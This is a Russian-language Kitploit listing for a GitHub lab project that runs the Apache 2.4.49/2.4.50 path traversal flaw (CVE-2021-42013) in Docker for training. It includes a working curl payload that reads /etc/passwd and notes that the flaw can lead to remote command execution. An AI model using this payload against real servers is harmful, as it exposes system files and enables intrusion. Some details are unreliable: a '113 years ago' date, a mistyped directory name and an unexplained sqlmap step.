Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Протестировано на: 2.4.49 и 2.4.50 Описание: Уязвимости обхода пути (Path Traversal) или удалённого выполнения кода (Remote Code Execution) в Apache 2.4.49 и 2.4.50 | Kitploit
Инструменты/GitHubGitHub/cybfar/cve-2021-42013-httpd
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Протестировано на: 2.4.49 и 2.4.50 Описание: Уязвимости обхода пути (Path Traversal) или удалённого выполнения кода (Remote Code Execution) в Apache 2.4.49 и 2.4.50

Репозиторий
113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Докеризация уязвимости: cve-2021-42013

Этот проект направлен на докеризацию конкретной уязвимости с помощью Docker. Цель — создать изолированную среду, в которой уязвимость можно безопасно эксплуатировать и тестировать.

Уязвимое приложение

Apache HTTP Server 2.4.50 - удалённое выполнение кода && обход пути

Установка

Для запуска этого проекта на вашей машине должны быть установлены:

  • Docker
  • Python
  • Curl

После установки необходимых компонентов вы можете склонировать этот Git-репозиторий на свою машину:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

Находясь в каталоге, выполните команду ниже, чтобы развернуть уязвимую среду:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

Затем перейдите к приложению по адресу http://localhost:8000 Если всё прошло успешно, вы должны увидеть сообщение "It works"

Эксплуатация уязвимости

Выполнение этого payload с помощью curl, приведённого ниже, показывает, что цель уязвима. Скрипт сгенерирует соответствующую команду sqlmap для эксплуатации уязвимости

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

Этот payload позволяет напрямую получать информацию о пользователе в системе без согласия пользователя.

После активации модулей cgi или cgid на сервере данная уязвимость позволит атакующему выполнять произвольные команды

Скачать инструмент